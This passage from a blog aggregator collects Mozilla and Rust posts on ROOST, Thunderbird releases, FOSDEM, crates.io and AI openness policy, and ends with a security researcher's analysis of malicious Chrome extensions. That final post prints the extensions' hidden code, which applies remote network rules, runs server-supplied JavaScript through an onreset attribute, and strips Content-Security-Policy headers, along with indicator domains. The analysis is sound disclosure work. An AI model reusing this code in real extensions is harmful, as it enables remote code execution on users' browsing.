  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed by the LLM in the background but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla BlogROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike ensuring that a broad set of stakeholders have a vested stake in its success. This is critical to building accessible, scalable and resilient safety infrastructure all of us need for the AI era. 

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support by technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges such as eliminating child sexual abuse material (CSAM) from AI datasets and models. 

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated  “when it comes to AI Safety and Security, openness is an antidote not a poison.” 

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (which was an official event on the road to the French AI Action Summit happening this week), brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of  the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community. 

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird Desktop Release Channel Will Become Default in March 2025

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel. It will provide monthly major releases instead of annual major releases. This provides several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase daily active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 daily active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on these release process details, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement at our Thunderbird Planning mailing list

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

The Mozilla BlogWelcoming Peter Rojas as Mozilla’s SVP of New Products

Headshot of Peter Rojas, Senior Vice President of New Products at Mozilla, wearing a gray sweater and smiling against a white background.

We’re thrilled to share that Peter Rojas has joined Mozilla Corporation as our new Senior Vice President of New Products. In this role, Peter will lead Mozilla’s endeavors to explore, build and scale new products that align with Mozilla’s greater mission and values. He will report to me and join Mozilla’s steering committee. 

At Mozilla, we are continuing to explore and scale new products that diversify revenue, address evolving consumer needs, and positively impact this new era of the internet. Peter brings a deep well of experience at the intersection of technology, entrepreneurship and product innovation –– expertise that will help Mozilla monetize and expand beyond our flagship browser. His leadership will be instrumental in bringing exciting new products to consumers who value privacy, choice and an open web.

Early in Peter’s career, he co-founded several influential startups, including the consumer technology news and review organization Engadget and the blogging network Weblogs Inc. He was also a founding partner at Betaworks Ventures, where he invested in groundbreaking companies like Rec Room, Hugging Face, Facemoji, and 8th Wall, among others. Several of these companies were later acquired by Niantic, Twitter and Google.

Most recently, Peter led incubations and early-stage explorations as head of product for Meta’s New Product Experimentation (NPE) group. He was also a senior product director for Messenger and Instagram Direct, where he helped tackle some of Meta’s biggest product challenges, including the monetization of Messenger. Peter also served as VP of strategy at AOL, overseeing strategy for AOL’s brand group, and was later promoted to co-director of AOL Alpha, the company’s experimental new product group.

In the past few months, Mozilla has brought on some strong, innovative product leadership, welcoming talent such as Anthony Enzor-DeMeo, Firefox SVP, and Ajit Varma, VP of Firefox Product. I look forward to working closely with Peter and our other new product leaders as Mozilla continues to evolve, offering a range of new products and services that advance our mission.

The post Welcoming Peter Rojas as Mozilla’s SVP of New Products appeared first on The Mozilla Blog.

About:CommunityFOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM wasn’t just another tech gathering. It is a representation of a vibrant community, open source innovation, and the spirit of collaboration. And we’re proud of being part of this amazing event since its inception.

This year, FOSDEM is celebrating its 25th anniversary. And unlike previous years’ gloomy weather, this year, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge in Mozilla’s and Thunderbird’s stands, where participants could play to win exclusive Mozilla t-shirts any many more special swag. It was a really fun way to introduce many projects from across pan-Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Casteluccio presented a talk about the usage of LLM’s to support Firefox developers with code review in the main track.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey on using the getaddrinfo API in Firefox.
  • Another Firefox engineer who’s working on Firefox Profiler, Nazim Can Altinova also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session like this where all of us can share our perspective, so thank you to all of you who attended the session!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
  • Then on the second half on Sunday, we also hosted the Mozilla devroom where we covered a wide range of Mozilla’s latest innovations from Mythbusting to Mozilla’s AI innovations and Firefox developments. Recordings will be available soon at FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In RustThis Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with performance of primary benchmarks showing no change over all.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.3% [0.2%, 0.6%] 32
Regressions ❌
(secondary)
0.5% [0.1%, 1.1%] 65
Improvements ✅
(primary)
-0.5% [-1.0%, -0.2%] 17
Improvements ✅
(secondary)
-3.1% [-10.3%, -0.2%] 20
All ❌✅ (primary) 0.0% [-1.0%, 0.6%] 49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups 49 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blogcrates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either: the crate has been published for less than 72 hours or the crate only has a single owner, and the crate has been downloaded less than 500 times for each month it has been published, and the crate is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered work-in-progress and e.g. the stability guarantees for the endpoints are not written down and the response schemas are also not fully documented yet.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • The crates.io team was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer ExperienceFirefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.

With the processing of actions now handled in the parent process the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Privacy BlogNavigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what does openness mean and how it can enable trustworthy, innovative, and equitable outcomes?

The workshop followed the Columbia Convenings on Openness and AI, that Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, have brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, openness, we were reminded in the discussion, is a holistic outlook. For AI in particular it is a pathway to getting to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals however contain natural tensions within them.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers can find it difficult or expensive to access tools to help identify and address AI risks. In particular the discussion surfaced an increasing tension between some researchers and startups who have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashtags. Accessing these data sets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by perceptions that open source AI development is not bothered by questions of safety. They pointed out that, especially when it comes to regulation, focusing on questions of safety makes them even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first regulatory frameworks on AI to be drafted, many people view the EU’s AI Act as a test bed to get to smarter AI regulation. While there is a widespread characterisation of regulation obstructing innovation, some participants highlighted that this can be misleading — many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with a governance that safeguards public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest. One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to truly publicly interested AI.
  4. Openness should be an explicit EU policy goal: As one of the furthest along in AI regulatory frameworks the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy,, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of Digital Economy, Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir PalantAnalysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

Screenshot of an extension pop-up. The text in the popup says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions” followed up with some instructions.

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name Weekly active users Extension ID Featured
Freemybrowser 10,000 bibmocmlcdhadgblaekimealfcnafgfn
AutoHD for Twitch™ 195 didbenpmfaidkhohcliedfmgbepkakam
Free simple Adult Blocker with password 1,000 fgfoepffhjiinifbddlalpiamnfkdnim
Convert PDF to JPEG/PNG 20,000 fkbmahbmakfabmbbjepgldgodbphahgc
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Auto Resolution Quality for YouTube™ 223 hdangknebhddccoocjodjkbgbbedeaam
Adblock.mx - Adblock for Chrome 1,000 hmaeodbfmgikoddffcfoedogkkiifhfe
Auto Quality for YouTube™ 100,000 iaddfgegjgjelgkanamleadckkpnjpjc
Anti phising safer browsing for chrome 7,000 jkokgpghakemlglpcdajghjjgliaamgc
Darktheme for google translate 40,000 nmcamjpjiefpjagnjmkedchjkmedadhc

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.

The code being executed

When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so it will respond with the real thing. For example, the list key of the response looks like this then:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

